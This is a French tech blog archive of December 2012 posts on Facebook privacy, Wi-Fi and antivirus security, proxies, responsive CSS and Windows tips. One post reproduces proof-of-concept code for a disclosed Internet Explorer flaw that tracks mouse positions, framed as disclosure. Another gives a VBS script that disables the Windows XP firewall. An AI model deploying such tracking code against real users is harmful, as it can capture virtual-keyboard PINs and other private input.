vendredi 28 décembre 2012

La confidentialité sur Facebook et la famille Zuckerberg

La famille Zuckerberg se fait piéger par les paramètres de confidentialité Facebook.Voici une petite histoire qui prouve que nous n’avons pas toujours le contrôle de notre vie privée sur le réseau social Facebook.
En effet, le jour de Noël, Randi Zuckerberg a publié une photo de famille autour d’un ilot de cuisine (américaine), qui semble tester en grimaçant la toute dernière application Poke de Facebook. Rien de bien intéressant, mais voilà, la photo en question s’est retrouvée publiée sur Twitter par Callie Schweitzer (directrice marketing Vox Media) alors qu’elle n’aurait pas du.
Randi, la soeur de Mark Zuckerberg n’a pas apprécié de voir la photo ainsi diffusée publiquement, qui pensait avoir posté la photo uniquement pour ses amis…Donc elle a immédiatement riposté par un message comme un coup de tweet :
 Facebook photo La confidentialité sur Facebook et la famille Zuckerberg
Callie Schweitzer s’est immédiatement excusée et a supprimé la photo en expliquant qu’elle pensait que la photo était publique, puisque cette dernière est apparue sur son fil d’actualité.
En réalité, la photo était visible par les « amis des amis » et Callie étant amie avec son autre soeur taguée sur la photo, elle a donc pu y avoir accès.
Tout cela démontre une nouvelle fois que les réglages des paramètres de confidentialité de Facebook ne sont pas clairs, même pour les Zuckerberg !
Zuckerberg La confidentialité sur Facebook et la famille Zuckerberg

jeudi 27 décembre 2012

Les séries les plus piratées en 2012

Comme chaque année, le blog TorrentFreak nous propose un Top 10 des séries les plus piratées en 2012 sur le réseau BitTorrent.
Un classement qui ne devrait pas ravir les chaînes mais qui nous permet de voir qu’elles sont les séries les plus populaires.
Selon ce classement, Game of Thrones, Dexter et The Big Bang Theory ont été les trois séries les plus téléchargées illégalement en 2012. L’an dernier, c’est la série Dexter qui l’avait emporté. Ce classement ne se base que sur l’épisode le plus téléchargé au cours de la saison diffusée cette année.
La majorité des téléchargements se font hors des Etats-Unis (80 %), Phénomène que le site explique par le décalage entre la diffusion des séries sur les télés américaines et celles des autres pays.
Voici donc ces dix séries, accompagnées du nombres de téléchargements qu’elles ont engendré durant l’année, ainsi qu’un comparatif qui est le nombre de spectateurs devant leur écran de télévision.
Ser2012 Les séries les plus piratées en 2012

mardi 25 décembre 2012

Le Wi-Fi se pirate facilement : protégez votre connexion Internet


Le Wi-Fi est partout, et avant tout chez vous, reliant sans fil votre PC à la box Internet. Mais si vous n'y prenez garde, votre accès peut être piraté !


Quand Julien reçoit la lettre recommandée, il est un peu inquiet. Pourtant, il n'a rien à se reprocher. Internet, il y va surtout pour consulter son courrier électronique, étudier la généalogie familiale, regarder les photos de famille qu'on lui envoie. Comprendre ce que cette étrange Haute Autorité usant d'un cachet officiel lui reproche est malaisé. Elle lui parle de téléchargements illicites, d'échanges de fichiers repérés, et d'un premier courrier électronique dont il n'a aucun souvenir.
Au milieu de ce galimatias sur des œuvres protégées qu'il aurait échangées, on lui impute surtout le fait de “ ne pas avoir mis en œuvre les moyens techniques nécessaires pour sécuriser sa connexion à Internet ”. Julien a pourtant toute confiance en son petit-neveu qui, cinq ans auparavant, lui avait installé Internet. Une nouvelle lettre suit, l'informant que son accès à Internet est coupé d'office parce qu'il est un pirate. Ne soyons pas durs avec Julien. Il n'a encore découvert que la partie émergée de l'iceberg.

Pirate malgré lui

Julien n'a jamais effectué d'activités illicites sur la Toile, mais s'est simplement fait pirater son accès à Internet. Et la technologie sans fil, le Wi-Fi, est extrêmement poreuse. Julien sait utiliser son PC pour les tâches courantes, bien sûr. Mais régler les paramètres de sécurité d'un modem-routeur ou d'une box, c'est trop lui en demander.
Comme son neveu le lui a appris, pour relancer la connexion quand elle a des ratés, il sait “ afficher les réseaux sans fil disponibles ”. Et sa connexion, nommée “ InternetJulien ”, apparaît bien avec un cadenas et indique “ Réseau sans fil sécurisé ”. Mais la réalité, c'est qu'à moins de voir au moins affiché “ Réseau sans fil sécurisé(WPA) ”, la fameuse sécurisation est… inexistante !
Sujette à des failles, la sécurisation normale, qui a pour nom Wep, ne tient que quelques minutes face à un pirate muni d'outils logiciels adéquats. Celui-ci peut alors s'immiscer dans le réseau domestique de Julien, utiliser sa connexion, voire fouiller dans ses disques durs… Tout ceci n'est que fiction, mais cette aventure pourrait arriver dès l'année prochaine (Lire l'encadré ci-dessous). Nous l'avons vérifié en essayant. Nous avons donc endossé les habits d'un pirate et forcé la protection d'un point d'accès, le nôtre en l'occurrence. La démonstration est éclatante.
Heureusement, les méthodes pour contrer un tel piratage ordinaire existent et sont simples à mettre en œuvre. Nous vous livrons donc toutes les informations pour faire de votre réseau sans fil domestique une vraie forteresse.

Vous serez coupable si…

Le piratage est répréhensible, passible de fortes amendes et de peine de prison. Mais le statut des outils permettant le piratage est bien plus complexe. Il s'agit souvent de “ suites de sécurité ” qui permettent de valider la sécurisation des réseaux. Ces logiciels d'audit ne sont pas illégaux, on se les procure facilement et ils permettent, par contournement de leur vocation première, de passer outre les protections.
Pour ce qui est de la responsabilité des actes délictueux commis en utilisant votre point d'accès à Internet, l'article L. 335-12 du Code de la propriété intellectuelle, modifié par la loi Dadvsi de 2006, oblige les abonnés à Internet à “ veiller à ce que cet accès ne soit pas utilisé à des fins de reproduction ou de représentation d'œuvres de l'esprit (…) en mettant en œuvre les moyens de sécurisation qui lui sont proposés (…) ”. Mais il n'y avait pas jusqu'ici de sanction prévue en cas de non-respect de cette obligation. Avec la loi Hadopi, en cours de débat au Parlement, c'est sur la base de la “ non-sécurisation ” de leur accès à Internet que les internautes seront sanctionnés, par le mécanisme de riposte graduée.
Une exception est bien sûr prévue, déchargeant les abonnés de leur responsabilité, dès lors que leur accès, même sécurisé, a été piraté. Mais, il incombera à l'abonné de faire la preuve de l'intrusion. Une preuve évidemment très difficile à apporter. En tout état de cause, vous serez a priori considéré coupable par l'Hadopi dès lors qu'un acte de piratage émanant de votre box aura été repéré, avant de pouvoir vous défendre. La seule solution consiste, bien évidemment, à ne pas vous faire pirater votre accès à Internet. Et donc à suivre nos conseils.

Qu'est-ce que c'est ?

Routeur. Matériel qui permet aux ordinateurs d'un réseau d'accéder à un autre réseau. Un routeur Internet sert par exemple à partager une connexion haut débit entre tous les micros d'un réseau local.
Wep.Wired Equivalent Privacy, nom d'un protocole, d'une technologie de sécurisation des réseaux sans fil. Une clé commune de 40 bits permet de chiffrer les communications entre les appareils sans fil. La norme Wep a été étendue pour accepter des clés plus conséquentes de 232 bits.
Wi-Fi. Nom commercial de la technologie IEEE 802.11x de réseau local Ethernet sans fil (WLAN), basé sur la fréquence 2,4 GHz et offrant – pour les deux standards les plus répandus (b et g) – des débits de transmission pouvant aller jusqu'à 54 Mbit/s. Une nouvelle norme, le 802.11n permet d'atteindre des débits théoriques allant jusqu'à 270 Mbit/s.
WPA.Wi-Fi Protected Access, mécanisme de sécurisation des réseaux sans fil mis en place pour répondre aux défaillances inhérentes du protocole Wep. Plusieurs versions du WPA existent, le WPA et le WPA 2. La version du WPA utilisée par le grand public est le WPA-PSK.

Comment bien configurer son antivirus Avast


Un antivirus est indispensable pour protéger son PC. Encore faut-il savoir ajuster cet outil complexe à ses besoins. Voici quelques clés pour vous aider à maîtriser l'un des logiciels de protection les plus populaires : Avast.


L'antivirus est un outil indispensable pour protéger son PC. Encore faut-il savoir ajuster cet outil complexe à ses besoins. Voici quelques clés pour vous aider à maîtriser ces logiciels de protection, en commençant par l'un des plus populaires : Avast!

Téléchargez et installez le logiciel

1 Ouvrez votre navigateur Web et rendez-vous sur 01net. pour télécharger la version gratuite d'Avast! Double-cliquez sur Télécharger et indiquez si vous souhaitez ou non participer à la communauté Avast! Valider cette option permet d'autoriser l'envoi anonyme de données concernant les virus et les fichiers suspects trouvés sur votre ordinateur afin que l'éditeur puisse lutter plus efficacement contre les menaces. 
agrandir la photo
Vous pouvez aussi choisir les éléments à installer en cochant la case Installation personnalisée. Il est toutefois recommandé d'effectuer une installation standard et de laisser la case décochée. Cliquez sur Suivant pour démarrer l'installation et sur Fin quand elle est terminée. L'icône Avast! apparaît alors sur votre Bureau ainsi qu'une boule orange dans la Barre de notification de Windows.
2 Double-cliquez sur l'un des raccourcis de l'antivirus pour ouvrir la fenêtre principale du logiciel. Sur la fenêtre d'accueil, un message vous invite à vous enregistrer dans les 30 jours. En effet, si Avast! est gratuit, l'enregistrement est nécessaire pour recevoir, après ce délai, les dernières mises à jour de la base de données virale. Pour cela, cliquez sur Enregistrez-vous maintenant. Les informations requises sont votre nom et une adresse mail valide. Une fois l'enregistrement effectué, vous recevrez un code valable un an. A la fin de ce délai, il faudra vous enregistrer à nouveau pour une année supplémentaire, et toujours gratuitement.

Découvrez l'interface

Avast! se pilote via quatre rubriques principales visibles dans le volet gauche. La rubrique Résumé donne un aperçu de l'état actuel de sécurité de votre ordinateur. En cliquant sur Plus de détails, vous pouvez voir quels modules de sécurité sont activés (Protection résidente), si la base de données antivirale est automatiquement mise à jour (Mise à jour automatique de la VPS), de quand date la dernière mise à jour (Version de la base de données virale VPS), la version actuelle d'Avast (Version du programme) et jusqu'à quand votre base de don-nées virale sera mise à jour (Date d'expiration). La sous-rubrique Statistiques vous donne des indications, par module de sécurité, sur le nombre d'éléments scannés et infectés. La rubrique Lancer un scan, elle, permet d'effectuer un scan manuel ou d'en programmer de façon régulière. La rubrique Protection résidente offre la possibilité de contrôler les différents modules de sécurité. Enfin, la rubrique Maintenance permet de mettre à jour manuellement l'antivirus et sa base de données.

 

mercredi 19 décembre 2012

Les différents types de proxy

En général, le proxy est un ordinateur faisant office de passerelle entre un poste client et Internet.
Un serveur proxy permet de faire le cache des pages les plus demandées pour accélérer le web, d’échapper certains filtres HTTP et aussi de naviguer de façon anonyme.
Nous avons déjà vu, c’est quoi un proxy et comment bien l’utiliser et cette fois-ci nous allons nous intéresser sur les différents grands types de serveurs proxys.
  • Proxy transparent
Proxy transparent ( Transparent proxy ) laisse passer votre adresse IP et signale que vous utilisez un proxy. On peut connaître votre véritable adresse IP sans aucun problème, car elle est stockée dans l’en-tête HTTP nommé REMOTE_ADDR.
  • Proxy anonyme
Proxy anonyme (anonymous proxy), masque votre véritable adresse IP, les variables REMOTE_ADDR et HTTP_VIA possèdent l’adresse IP du proxy, mais vous n’êtes pas entièrement anonyme, car on peut retrouver votre adresse IP dans l’en-tête HTTP nommé HTTP_X_FORWARDED_FOR.
  • Proxy hautement anonyme
Proxy hautement anonyme (high anonymously), vous rend totalement anonyme puisqu’il fait croire au site que vous visitez, que l’adresse IP que vous utilisez est bien la votre. Aucun en-tête HTTP ne possède votre adresse IP, l’anonymat est donc garanti. Il s’agit là du proxy le plus intéressant. icon smile Les différents types de proxy

Tester le degré d’anonymat d’un proxy

Pour savoir si un proxy est totalement anonyme, vous pouvez utiliser du code PHP.
Pour cela, créer un nouveau document texte avec Notepad ou autres et écrire le code ci-dessous:
01$myip = trim($_GET['myip']);
02 
03if(empty($myip)) {
04 
05echo "SVP entrez votre adresse IP origine"."\n";
06 
07}
08else if (($_SERVER['REMOTE_ADDR'] == $myip) ||
09($_SERVER['HTTP_X_FORWARDED_FOR'] == $myip)) {
10 
11echo "Le proxy n'est pas anonyme"."\n";
12 
13}
14else {
15echo "Le proxy est Anonyme"."\n";
16}
Puis enregistrez le fichier sous : monscript.php
Il suffit maintenant de l’uploder sur un serveur web Apache et de tester votre proxy comme suit :
1www.monsite.com/monscript.php?myip= votre adresse IP originale
Comme vous avez pu le voir dans les lignes de code, on récupère l’adresse IP et on la compare avec les variables REMOTE_ADDR et HTTP_X_FORWARDED_FOR.

Une faille critique dans les smartphones Galaxy S2 et 3, Note 1 et 2, et les tablettes Galaxy Note et Tab Plus

Un développeur à découvert  samedi dernier, une faille extrêmement critique dans les derniers smartphones de Samsung, liée aux processeurs utilisés. La vulnérabilité a été décrite par l’utilisateur « alephzain » sur XDA Developers, un forum pour les développeurs d’applications mobiles.
Lorsque « alephzain » cherchait une manière simple de rooter son appareil Samsung. Il s’est alors aperçu que le noyau Android utilisé par Samsung permettait l’accès en lecture / écriture de toute la mémoire physique du smartphone, même celle utilisée par le noyau. Cela permet de rooter les téléphones et tablettes samsung par une application malveillante téléchargé sur Google Play par exemple.
Une faille plutôt importante, car en théorie, aucune application ne doit pouvoir accéder au root du téléphone sans que l’utilisateur ne l’autorise. Une fois l’accès root obtenu, il serait possible pour une personne malintentionnée de lire vos données , de briquer le smartphone ou de l’utiliser à d’autres fins malicieuses.
Ce sont en fait, semble-t-il, tous les appareils qui utilisent un processeur Exynos et qui recourent à du code Samsung qui sont potentiellement concernés par cette faille de sécurité.

exynos faille Une faille critique dans les smartphones Galaxy S2 et 3, Note 1 et 2, et les tablettes Galaxy Note et Tab Plus
Selon « alephzain », membre de xda-developers, Samsung a été mis au courant par l’existence de la faille.

dimanche 16 décembre 2012

Responsive design: adaptez votre site à toutes les résolutions

La résolution d’écran des visiteurs est la première préoccupation des webmasters qui mettent en place le design de leur site.
Auparavant, on consultait un site web depuis son ordinateur de bureau ou son PC portable par contre, aujourd’hui on utilise des smartphones et des tablettes ce qui nous donne plusieurs résolutions à gérer.
Dans un premier temps, les développeurs web ont pensé à réaliser des « sites mobiles« . Ces sites ont des adresses du type « m.facebook.com ». Bien que cette solution paraisse adaptée au premier abord, elle a plusieurs défauts :
  •  Les tablettes et les smartphones existent dans plusieurs formats : iPhone, iPad, iPad mini, Galaxy Tab… Il y a donc une infinité de résolutions à gérer. On ne peut pas créer un site ipadmini.facebook.com, iphone.facebook.com, etc… icon biggrin Responsive design: adaptez votre site à toutes les résolutions
  •  Les appareils sont de plus en plus puissants. Les sites mobiles sont conçus avec très peu d’interactivité : ils sont en général très statiques. Or, les performances des appareils augmentent et on peut être plus créatif qu’avant.
  •  Enfin, il y a des risques de duplication de contenu (duplicate content) ce qui est mauvais d’un point de vue SEO si c’est mal fait.
L’idéal est alors de créer des pages web qui s’adaptent automatiquement à chaque support. C’est là que response design entre en jeu. Techniquement, on obtient un design adapté grâce aux Media Queries CSS.
Les media queries font partie des nouveautés de CSS3. Il ne s’agit pas de nouvelles propriétés mais de règles que l’on peut appliquer dans certaines conditions.
Nous allons pouvoir dire « Si la résolution de l’écran du visiteur est inférieure à tant, alors applique les propriétés CSS suivantes ». Cela nous permet de changer l’apparence du site dans certaines conditions : nous pourrons augmenter la taille du texte, changer la couleur de fond, masquer ou changer la taille des images, etc.
Parmi les principales règles permettant de construire des media queries, on trouve:
01color : gestion de la couleur (en bits/pixel).
02height : hauteur de la zone d'affichage (fenêtre).
03width : largeur de la zone d'affichage (fenêtre).
04device-height : hauteur du périphérique.
05device-width : largeur du périphérique.
06orientation : orientation du périphérique (portrait ou paysage)
07media : type d'écran de sortie. Quelques-unes des valeurs possibles :
08screen : écran « classique » ;
09handheld : périphérique mobile ;
10print : impression ;
11tv : télévision ;
12projection : projecteur ;
13all : tous les types d'écran.

Exemple d’utilisation du response desgin 

Déjà des sites comme mashable.com, Barackobama.com ou smashingmagazine.com l’utilise sur leurs projet. Pour expérimenter le Responsive Design sur ces sites, vous pouvez les visiter et faire varier la largeur de la fenêtre de son navigateur. Cela vous permet ainsi de simuler les différentes résolutions des appareils mobiles.
Voici un test tout simple ou je vais changer la couleur et la taille du texte si la fenêtre fait plus ou moins de 1024 pixels de large.
01p
02{
03color: green;
04}
05@media screen and (max-width: 1024px)
06{
07p
08{
09color: yellow;
10background-color: black;
11font-size: 1.5em;
12}
13}

samedi 15 décembre 2012

protégez-vous des sites dangereux

Web of Trust est un module complémentaire à installer dans votre navigateur. Téléchargez ci-dessous la version de WOT qui correspond à celui que vous utilisez et installez-la. Vous devrez créer un compte pour l'utiliser. Enregistrez-vous, laissez le niveau de protection à sa valeur par défaut et validez.
Dans votre navigateur, une nouvelle icône WOT précise le degré de confiance que vous pouvez accorder au site que vous consultez. Cliquez dessus pour afficher des informations détaillées.
WOT vous indique également le risque que présentent les résultats d'une recherche sur Google, AOL, Ask, Yahoo! ou Wikipédia en affichant une icône à côté des résultats. Verte : la page est fiable ; rouge : elle présente un risque.
Si vous tentez d'accéder à une telle page, WOT vous prévient et en bloque l'accès. Si vous savez ce que vous faites, vous pouvez toutefois contourner le blocage en cliquant sur Ignorer l'alerte et accéder au site… mais à vos risques et périls !
Télécharger WOT pour Firefox
Télécharger WOT pour Opera
Télécharger WOT pour Chrome
Télécharger WOT pour Safari
Télécharger WOT pour Internet Explorer
 

Ajoutez une extension à Chrome pour protéger vos enfants

L’extension baptisée Net-écoute n’est compatible qu’avec le navigateur Google Chrome. Si vous utilisez cet outil, nous vous la recommandons chaudement. Elle permet cinq actions différentes :
- Consulter une série de questions/réponses généralistes concernant les précautions à prendre sur Internet ;
- Avoir des informations utiles lorsque vous êtes sur un service Google ou une page Facebook ;
- Contacter par chat un conseiller de l'association e-Enfance ;
- Signaler un contenu illégal ou choquant à Point de contact. Si vous êtes sur Facebook, le bouton Net écoute vous amène sur la page d’aide du réseau social pour dénoncer un abus. Sinon, des propositions s’affichent pour spécifier la nature du contenu dérangeant ;
- Faire une capture d’écran de la page Web incriminée en un clic et la récupérer.
Pour l’installer, rendez-vous sur https://chrome.google.com/webstore/detail/bjnchdannnndedjbpfakgccdlcnilbgj. Cliquez sur Ajouter à Chrome. Cliquez sur Installer dans la fenêtre qui s’ouvre. Et voilà, le bouton Net écoute, s’est ajouté àvotre barre d’outils de Chrome.
 

vendredi 14 décembre 2012

Google Maps pour iOS devient n°1 de l’AppStore en quelques heures

Google Maps est de retour sur iOS. Lancée hier matin, il n’aura fallu que quelques heures pour que l’application Google Maps devient N°1 dans la catégorie des applications gratuites sur l’App Store. Pour le moment, ni Apple, ni Google ne désirent dire le nombre exact de téléchargement.
Par contre, on sait que Google Maps pour iOS propose le guidage vocal, les informations sur les transports en commun, la navigation immersive Street View ou encore le mode Google Earth 3D.
Les utilisateurs qui sont encore restés sous iOS5 pour ne pas perdre Google Maps vont enfin pouvoir basculer sur la version 6 du système mobile.
 Afin de télécharger Google Maps pour iPhone, il vous suffit de vous rendre sur l’App Store.

Les mot-clés les plus recherchés en 2012 chez Google

Google a dévoilé hier soir son fameux Google’s Zeitgeist, un site qui réunit les recherches les plus demandées sur Google. C’est un  classement des termes les plus souvent saisis dans le monde en 2012 dans son moteur de recherche.
En effet, quelque soit la catégorie, on ne trouve pas de termes non liés à un évènement ou une personnalité qui ont défrayé la chronique au cours de l’année, que ce soit Whitney Houston dans le classement général, ou le duo infernal iPad 3/iPhone 5 dans l’électronique grand public.
Voici la liste qui représente le top des recherches sur Google durant l’année 2012 :
Tendances monde
1. Whitney Houston
2. Gangnam Style
3. Hurricane Sandy
4. iPad 3
5. Diablo 3
6. Kate Middleton
7. Olympics 2012
8. Amanda Todd
9. Michael Clarke Duncan
10. BBB12
Tendance Canada
1. Pinterest
2. Hurricane Sandy
3. Olympics
4. Diablo 3
5. Gangnam Style
6. Hunger Games
7. SOPA
8. Star Académie
9. KONY
10. Zerg Rush
Tendances France
1. Free Mobile
2. Euro 2012
3. Secret Story
4. Bref
5. Mcdonalds.Fr
6. RTBF
7. Mappy Itinéraire
8. JO 2012
9. Whitney Houston
10. Mytf1
Tendances hight-tech
Côté high-tech, une rubrique qui nous intéresse un peu plus ici sur FunInformatique
1. iPad 3
2. Samsung Galaxy S3
3. iPad Mini
4. Nexus 7
5. Galaxy Note 2
6. Play Station
7. iPad 4
8. Microsoft Surface
9. Kindle Fire
10. Nokia Lumia 920
Pour introduire son bilan, Google propose aussi une vidéo avec les images les plus marquantes de l’année insérées dans les interfaces de ses applications (YouTube, Google+, Chrome, etc.)

Une faille dans IE permet de suivre les mouvements de la souris

Malgré les nombreuses améliorations apportées au fil de temps, Internet Explorer versions 6 à 10 est susceptible d’être touché par une faille de sécurité qui permet à un attaquant de suivre et d’enregistrer tous les mouvements de votre souris, et cela sur tout l’écran, même si IE est réduit dans la barre des tâches ou inactif .
Cette faille pourrait s’avérer dangereuse, surtout pour les clients de certaines banques, qui proposent de taper en ligne son code confidentiel via un clavier virtuel, pour parer aux keyloggers.
Depuis le 1er octobre, Microsoft n’aurait pas avancé sur la mise en place d’un patch correctif, ce qui pousse Spider.io à divulguer au public l’existence de cette vulnérabilité en espérant ainsi pousser l’éditeur du navigateur Internet à la réaction.
Si cela vous intéresse, voici le code de l’exploit :
01Exploit
02-----------------
03<!DOCTYPE html>
04<html>
05<head>
06 <meta charset="utf-8" />
07 <title>Exploit Demo</title>
08 <script type="text/javascript">
09 window.attachEvent("onload", function() {
10 var detector = document.getElementById("detector");
11 detector.attachEvent("onmousemove", function (e) {
12 detector.innerHTML = e.screenX + ", " + e.screenY;
13 });
14 setInterval(function () {
15 detector.fireEvent("onmousemove");
16 }, 100);
17 });
18 </script>
19</head>
20<body>
21 <div id="detector"></div>
22</body>
23</html>
Et voici une démonstration de la faille en vidéo pour que vous voyiez ce que ça donne :
 Il n’y a qu’une seule façon de parer cette technique: Ne pas utiliser IE ! icon smile Une faille dans IE permet de suivre les mouvements de la souris

Les erreurs de programmation les plus dangereuses

La « Common Weakness Enumeration » élaborée par MITRE, comprend la liste des erreurs de programmation les plus dangereuses.
Cette liste est dressée par plus de 50 experts issus d’organisations de renom telles que le SANS Institute, RSA, Red
Hat Sun, Microsoft, etc.
Toutes les failles relevées sont dangereuses, car elles permettent souvent aux pirates informatiques de prendre le contrôle total d’un logiciel, de voler des données ou d’empêcher un logiciel de fonctionner.
Le but principal de cette liste est d’éduquer les programmeurs afin d’éviter les erreurs à la source, et d’éliminer les problèmes les plus fréquents avant même la distribution du logiciel.
Voici la liste des 23 erreurs de programmation les plus dangereuses:
  • Non-conservation de la structure des pages Web
  • Mauvais nettoyage d’éléments spéciaux utilisés pour une commande SQL (injection SQL)
  • Copie dans le tampon sans contrôle de la taille de l’entrée (« Classic Buffer Overflow« )
  • Falsification de demande interdite (Cross-site request forgery, CSRF)
  •  Mauvais contrôle d’accès (autorisation)
  • Décision relative à la sécurité, fondée sur des données d’entrée non approuvées
  • Limitation erronée d’un chemin d’accès à un répertoire restreint (“Path Traversal”)
  • Absence de restrictions au téléchargement de fichiers dangereux
  • Mauvais nettoyage d’éléments spéciaux utilisés dans une commande d’OS (“OS Command Injection”)
  • Absence de chiffrement des données sensibles
  • Utilisation d’informations d’authentification codées en dur
  • Accès au tampon avec une valeur de longueur incorrecte
  • Mauvais contrôle des noms de fichiers pour la directive include/require dans un programme PHP (“PHP File Inclusion”)
  • Validation erronée d’un index de tableau
  • Mauvaise recherche de conditions inhabituelles ou exceptionnelle
  • Divulgation d’informations dans un message d’erreur
  • Dépassement ou bouclage d’entier (“Integer overflow or wraparound”)
  • Calcul incorrect de la taille du tampon
  • Absence d’authentification pour une fonction critique
  • Téléchargement de code sans contrôle d’intégrité
  • Affectation de ressources sans limites
  • Redirection d’URL vers un site non approuvé (« Open Redirect »)
  •  Utilisation d’un algorithme de chiffrement décrypté ou dangereux

samedi 8 décembre 2012

Facebook : déconnectez une session à distance

Lancez votre navigateur et ouvrez une session Facebook. Cliquez sur Paramètres du compte, dans le menu déroulant en haut de la page. Cliquez ensuite sur Sécurité dans la colonne de gauche.
En bas, cliquez sur Sessions actives. S’affiche alors la liste de tous les périphériques où vous vous êtes connecté à Facebook. Normalement, ils portent tous un nom personnalisé. Repérez celui qui correspond à votre bureau et cliquez sur Arrêter l’activité. Cela fermera la session.
En revanche, si sur un périphérique (un smartphone ou une tablette), vous vous êtes connecté sur le site mobile de Facebook, m.facebook.com, cela ne fonctionne pas.
 
 

Verrouiller son Mac par mot de passe

Avec Windows, le simple raccourci clavier Win L suffit pour verrouiller la session utilisateur active. Il faut ensuite effectuer le raccourci Ctrl + Alt + Supp, puis saisir le mot de passe utilisateur pour ouvrir à nouveau la session. Sur Mac, de nombreux utilitaires permettent de faire sensiblement la même chose. Mais le système en lui-même dispose de tout ce qu’il faut pour cela.

Assurez-vous tout d’abord d’avoir associé un mot de passe à votre compte utilisateur. Ouvrez les Préférences Système et cliquez sur Utilisateurs et groupes. Définissez votre mot de passe si ce n’est déjà fait. Cliquez ensuite sur le bouton Tout afficher en haut à gauche de la fenêtre. Cliquez sur Sécurité et confidentialité et cochez la case Exiger un mot de passe pour la suspension d’activité ou l’économiseur d’écran.
Effectuez à présent le raccourci Ctrl + Maj + Eject. L’écran de votre Mac s’éteint : l’activité est suspendue. Bougez la souris ou pressez une touche du clavier, il se rallume. Vous devez saisir votre mot de passe pour accéder de nouveau à votre session.

Bloquez l'accès à certains sites sur votre PC

Sur le disque dur où est installé votre système, par défaut C, ouvrez le dossier Windows, puis System32 et, enfin, Drivers et trouvez le dossier nommé etc. Dans ce dossier, recherchez un fichier baptisé hosts. Faites un clic droit dessus et choisissez Ouvrir, une liste de programmes vous est proposée pour l’ouverture, choisissez le Bloc-notes. En bas du texte affiché, vous devez voir la ligne 127.0.0.1 localhost ou ::01 Localhost.
Ajoutez une ligne en dessous et saisissez l’adresse du site que vous voulez bloquer sous cette forme : 127.0.0.1 www.nom_de_domaine.com. Vous pouvez définir d’autres sites à éviter en les ajoutant à la suite, séparés par une espace, en n'omettant pas d’ajouter chaque fois 127.0.0.1 devant l’adresse. Enregistrez le fichier avec vos modifications (menu Fichier, puis Enregistrer). Désormais, ces sites ne seront plus accessibles, un message d’erreur apparaîtra dans le navigateur. Pour revenir en arrière, éditez à nouveau le fichier hosts et effacez les adresses que vous souhaitez rendre disponibles.

Internet Download Manager - IDM/IDMan



Licence :
Démonstration
Taille :
4.7 Mo
Langue :
Francais et Anglais
Version :
6.12
Configuration minimale :
Windows 9x/2000/XP/Vista/7

téléchargé les 7 derniers jours
88016 fois
Internet Download Manager peut accroître jusqu’à 500% la vitesse de vos téléchargements. Il permet en outre de planifier les opérations de transfert et de reprendre celles interrompues à la suite de pertes de connexion, problèmes de réseau, arrêts d’ordinateur ou coupures d’alimentation électrique. Internet Download Manager met en œuvre une segmentation dynamique des fichiers et un téléchargement par morceaux. Il optimise la vitesse de téléchargement en adaptant dynamiquement vos paramètres de connexion. Files d’attente de téléchargements, pare-feu, serveurs proxy et miroirs, redirections, mouchards, répertoires à accès restreint sont supportés par Internet Download Manager. Sans oublier un grand nombre de différentes plateformes de serveurs. S’intégrant parfaitement à Internet Explorer, Netscape, Opera et Mozilla, Internet Download Manager améliore considérablement les téléchargements.

vendredi 7 décembre 2012

BitDefender 10 Free Edition

BitDefender dans sa version gratuite est un antivirus classique qui permet de s'assurer que votre ordinateur n'est pas infecté. Le programme peut scanner à tout moment vos disques durs afin de détecter et nettoyer d'éventuels virus. Lors d'une détection, le fichier contaminé peut également être placé en quarantaine. Outre la possibilité de planifier le scan de vos unités, un rapport complet sera généré en fin d'analyse. BitDefender propose également des mises à jours régulières et gratuites du fichier de définitions des virus.


Notre Avis : Si BitDefender est un bon outil de scan, il n'offre aucune protection en temps réel. Pour une protection plus complète, il faudra donc utiliser en parallèle un logiciel antivirus comme Avast ou mieux encore Antivir par exemple.

Informations sur BitDefender :

A propos de BitDefender...
  • Editeur : http://www.bitdefender.com
  • Version : 10 Free Edition
  • Langue : Anglais
  • Dernière mise à jour : le 24/08/2007 à 16h12
  • Licence : Freeware
Temps de téléchargement :
en 56K : 51 min 24 s
en 512K : 6 min 37 s
en 1024K : 3 min 49 s
en 2M : 1 min 24 s
en 5M : 34 sec
en 20M : 8 sec 

Contrôler le firewall XP d'un seul clic

Nous allons créer deux scripts VBS permettant de contrôler le pare-feu de Windows XP SP2. Ces petits scripts placés sur le bureau permettront d'activer ou de désactiver le firewall d'un simple clic. Rapide et efficace !
Chacun des deux vbs est composé de trois lignes. Les scripts fonctionnent uniquement avec Windows XP SP2. Nous allons commencer par créer le script permettant la désactivation du firewall.

Ouvrez votre éditeur de texte favori (le Bloc-notes fera parfaitement l'affaire : menu Démarrer, Exécuter... et tapez notepad).

Copiez ensuite les lignes suivantes :

Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile

objPolicy.FirewallEnabled = FALSE


Sauvegardez le fichier du nom de votre choix avec l'extension .vbs (Firewall_OFF.vbs par exemple).


Passons maintenant au script permettant l'activation du firewall :

Copiez les lignes suivantes dans votre éditeur de texte :

Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile

objPolicy.FirewallEnabled = TRUE


Sauvegardez le fichier du nom de votre choix avec l'extension .vbs (Firewall_ON.vbs par exemple).


Vous pouvez placer ces deux fichiers où bon vous semble, le plus pratique étant de les déposer sur le bureau afin de pouvoir y accéder simplement.

Les deux scripts sont également à votre disposition ci-dessous :

Activer le firewall
Désactiver le firewall
Activer le firewall de Windows XP
Désactiver le firewall de Windows XP

Sécurisons un peu Windows

Windows, n'étant pas très sécurisé par défaut, laisse ouvert d'immenses failles de sécurité exploitables par des tiers mal intentionnés. Ce guide rapide permet d'y remédier et d'éradiquer les divers espions et traceurs de Microsoft.
Plutôt que de faire de nombreuses modifications manuellement, nous allons utiliser deux logiciels :
- Xp-Antispy
- Safe-XP
Tous deux sont gratuits.


Commençons par Xp-Antispy :
En premier lieu, il faut activer les paramètres avancés dans le menu Spécial.

- Les cases avec la coche verte représentent les actions déjà effectuées
- Les cases vides sont les options que vous pouvez activer librement
- Les cases avec le point d'exclamation vont s'appliquer d'elles même en appliquant les paramètres
- Les cases avec un sens interdit sont des options intouchables.

Globalement il est conseillé d'activer toutes les options sauf :

- activer l'arrêt rapide (qui change rien et peut faire planter Windows)
- désactiver les MAJ automatiques (c'est vous qui voyez)
- le planificateur de tâches peut vous être utile (si vous avez des taches programmés)
- l'option de purge du fichier d'échange est très bien mais ralentit l'extinction de votre pc d'une dizaine de secondes.

Fonctionnement de XP-Antispy



Après application des paramètres, utilisons SafeXP :
Pour avoir le logiciel en Français, le petit drapeau est en bas à droite.

